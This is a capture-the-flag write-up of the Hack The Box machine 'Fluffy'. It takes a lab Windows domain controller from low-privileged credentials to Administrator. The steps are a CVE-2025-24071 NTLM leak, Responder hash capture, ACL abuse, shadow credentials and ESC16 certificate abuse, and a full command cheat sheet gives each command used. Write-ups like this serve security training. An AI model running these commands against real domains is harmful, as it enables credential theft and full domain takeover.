HTB: Fluffy

🐑 Fluffy

Machine: Fluffy
Difficulty: Easy
Theme: Assumed breach → NTLM capture → ACL abuse → Shadow credentials → ADCS abuse → Administrator

---

🎯 Summary

Fluffy starts with valid low-privileged domain credentials for j.fleischman. A writable SMB share contains a PDF notice referencing CVE-2025-24071. By abusing that bug, another user’s NTLMv2 hash can be captured and cracked, giving access to p.agila.

Further Active Directory enumeration reveals a transitive ACL path:

• p.agila can be added to service accounts
• that group has control over winrm_svc and ca_svc

This allows:

• shadow credential abuse to recover hashes for those service accounts
• WinRM access via winrm_svc
• ADCS abuse via ca_svc
• escalation to Administrator

---

1. Enumeration

Initial scanning showed:

• SMB
• LDAP / LDAPS
• Kerberos
• WinRM

This immediately identified the target as a Domain Controller.

The domain and DC hostname were added to /etc/hosts:

echo "10.10.11.69 fluffy.htb dc01.fluffy.htb" | sudo tee -a /etc/hosts

A quick SMB enumeration with the provided credentials showed a writable share called IT.

nxc smb 10.10.11.69 -u 'j.fleischman' -p '<REDACTED>' --shares

Then:

smbclient '//10.10.11.69/IT' -U 'j.fleischman%<REDACTED>'
ls
get Upgrade_Notice.pdf

The interesting file was Upgrade_Notice.pdf.

---

2. Initial Foothold via CVE-2025-24071

The PDF referenced CVE-2025-24071, a Windows File Explorer vulnerability that can leak NTLM credentials when a crafted ZIP containing a .library-ms payload is handled.

Since the IT share was writable, the next move was:

1. generate a malicious ZIP
2. upload it to the share
3. wait for an NTLM authentication attempt
4. capture it with Responder

Create the malicious ZIP

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py

Upload it

smbclient '//10.10.11.69/IT' -U 'j.fleischman%<REDACTED>'
put exploit.zip

Start Responder

sudo responder -I tun0

After a short wait, an NTLMv2 hash for p.agila was captured.

Crack the hash

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

This recovered:

• p.agila : <REDACTED>

---

3. Active Directory Enumeration with BloodHound

With p.agila, the AD environment was enumerated.

bloodhound-python -d fluffy.htb -u 'p.agila' -p '<REDACTED>' -dc 'dc01.fluffy.htb' -c all -ns 10.10.11.69
sudo neo4j console

The critical findings were:

• p.agila is part of Service Account Managers
• that group has GenericAll over service accounts
• the service accounts group has GenericWrite over:
  • ca_svc
  • winrm_svc
  • ldap_svc

This gave a clean privilege escalation path.

---

4. Add p.agila to service accounts

bloodyAD -u 'p.agila' -p '<REDACTED>' -d fluffy.htb --host 10.10.11.69 add groupMember 'service accounts' p.agila

That successfully added p.agila to the group.

---

5. Shadow Credentials on Service Accounts

With the new group membership, shadow credentials were added to:

• ca_svc
• winrm_svc

This yielded their NT hashes.

certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account ca_svc
certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account winrm_svc

If Kerberos time skew becomes an issue:

sudo ntpdate dc01.fluffy.htb

Recovered:

• ca_svc : <REDACTED>
• winrm_svc : <REDACTED>

---

6. WinRM Shell as winrm_svc

Since winrm_svc is part of Remote Management Users, WinRM access worked immediately.

evil-winrm -u 'winrm_svc' -H <REDACTED> -i dc01.fluffy.htb

From there:

whoami
type C:\Users\winrm_svc\Desktop\user.txt

This provided the user flag.

---

7. Enumerate ADCS

The next step was confirming Active Directory Certificate Services.

nxc ldap 10.10.11.69 -u 'winrm_svc' -H <REDACTED> -M adcs

Then enumerate vulnerable certificate configuration:

certipy-ad find -u 'ca_svc' -hashes <REDACTED> -dc-ip 10.10.11.69 -vulnerable -enabled -stdout

The important finding was ESC16.

---

8. Abuse ca_svc to Request an Administrator Certificate

The path used was:

1. change the UPN of ca_svc to administrator
2. request a certificate using ca_svc
3. restore the original UPN
4. authenticate using the certificate
5. recover Administrator’s NT hash

Change UPN

certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'administrator'

Request certificate

certipy-ad req -u 'ca_svc' -hashes <REDACTED> -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

This generated:

• administrator.pfx

Restore original UPN

certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'ca_svc@fluffy.htb'

Authenticate with the certificate

certipy-ad auth -pfx administrator.pfx -domain 'fluffy.htb' -dc-ip 10.10.11.69

This recovered:

• Administrator NT hash: <REDACTED>

---

9. Final Shell as Administrator

With the Administrator NT hash, WinRM access to the DC was straightforward.

evil-winrm -u 'Administrator' -H <REDACTED> -i dc01.fluffy.htb

Then:

whoami
type C:\Users\Administrator\Desktop\root.txt

This completed the box.

---

🔗 Condensed Attack Chain

j.fleischman
  ↓
Writable SMB share (IT)
  ↓
Upgrade_Notice.pdf → CVE-2025-24071 clue
  ↓
Responder capture
  ↓
p.agila
  ↓
BloodHound
  ↓
Add p.agila to "service accounts"
  ↓
Shadow credentials on winrm_svc + ca_svc
  ↓
WinRM as winrm_svc
  ↓
ADCS enumeration
  ↓
ESC16
  ↓
Modify ca_svc UPN to administrator
  ↓
Request certificate
  ↓
Authenticate as Administrator
  ↓
WinRM as Administrator

---

🧠 Key Takeaways

• Writable shares plus user interaction can quickly yield new credentials.
• BloodHound is most valuable when used to identify transitive control paths.
• Shadow credentials are extremely effective once ACL abuse is available.
• ADCS remains one of the most dangerous misconfiguration surfaces in AD.
• ESC16 can allow privilege escalation even when certificate templates do not immediately look obviously abusable.

---

⚡ Commands Cheat Sheet

# SMB enumeration
nxc smb 10.10.11.69 -u 'j.fleischman' -p '<REDACTED>' --shares
 
# Upload exploit
smbclient '//10.10.11.69/IT' -U 'j.fleischman%<REDACTED>'
 
# Responder
sudo responder -I tun0
 
# Crack NTLMv2
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
 
# BloodHound collection
bloodhound-python -d fluffy.htb -u 'p.agila' -p '<REDACTED>' -dc 'dc01.fluffy.htb' -c all -ns 10.10.11.69
 
# Add group member
bloodyAD -u 'p.agila' -p '<REDACTED>' -d fluffy.htb --host 10.10.11.69 add groupMember 'service accounts' p.agila
 
# Shadow creds
certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account ca_svc
certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account winrm_svc
 
# WinRM foothold
evil-winrm -u 'winrm_svc' -H <REDACTED> -i dc01.fluffy.htb
 
# ADCS check
nxc ldap 10.10.11.69 -u 'winrm_svc' -H <REDACTED> -M adcs
certipy-ad find -u 'ca_svc' -hashes <REDACTED> -dc-ip 10.10.11.69 -vulnerable -enabled -stdout
 
# UPN abuse
certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'administrator'
 
# Cert request
certipy-ad req -u 'ca_svc' -hashes <REDACTED> -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
 
# Restore UPN
certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'ca_svc@fluffy.htb'
 
# Auth with cert
certipy-ad auth -pfx administrator.pfx -domain 'fluffy.htb' -dc-ip 10.10.11.69
 
# Final shell
evil-winrm -u 'Administrator' -H <REDACTED> -i dc01.fluffy.htb

---

🔗 Related Manual Notes

Field-manual techniques demonstrated on this box:

• SMB_Ports_139_445 — SMB share enumeration
• Password_Cracking_Hashcat — cracking the captured NTLM hash
• AD_ACL_Abuse — ACL-based privilege abuse
• Pass_the_Certificate — ADCS certificate abuse & authentication (ESC16)
• AD_Credentialed_Enum_Windows — authenticated AD enumeration

---

🧭 Diagnostic Map

Quick lookup of common failure signals seen on this machine and the correct recovery move. Use this when output looks “wrong” but the underlying step is actually salvageable.

Symptom: No NTLMv2 hash captured after uploading the malicious ZIP
Meaning: Responder is up but not on the path the victim reaches, or the share never triggered
Next: Confirm Responder is on the VPN interface (-I tun0), the IT share is writable, and a Windows user actually browses it

Symptom: certipy-ad shadow auto fails with a Kerberos / clock-skew error
Meaning: Local clock has drifted from the DC; Kerberos rejects the auth
Next: Sync time to the DC: sudo ntpdate dc01.fluffy.htb and retry

Symptom: certipy-ad find -vulnerable reports no vulnerable templates
Meaning: ESC16 is a CA-level vulnerability, not a per-template one
Next: Don’t stop at the template list; check CA settings and look for the ESC16 finding

Symptom: Logged into the cert as administrator but the original service still doesn’t work
Meaning: UPN was switched to administrator and never restored, breaking the original ca_svc account
Next: After the cert is issued, restore the original UPN (ca_svc@fluffy.htb) before doing anything else

Symptom: Have the Administrator NT hash but RDP/SMB rejects it
Meaning: Tooling needs explicit pass-the-hash + administrative SMB exec
Next: Use evil-winrm -u Administrator -H <NT_HASH> (WinRM is in scope here)

---

📝 Personal Notes

The decisive step on Fluffy is not the initial credential or the SMB share by itself. The real turning point is recognizing that p.agila’s group relationships create a service-account control path that leads directly into both:

• a WinRM-capable account
• and a CA-related account

Once that is clear, the box becomes a clean ACL + ADCS chain rather than a collection of unrelated Windows techniques.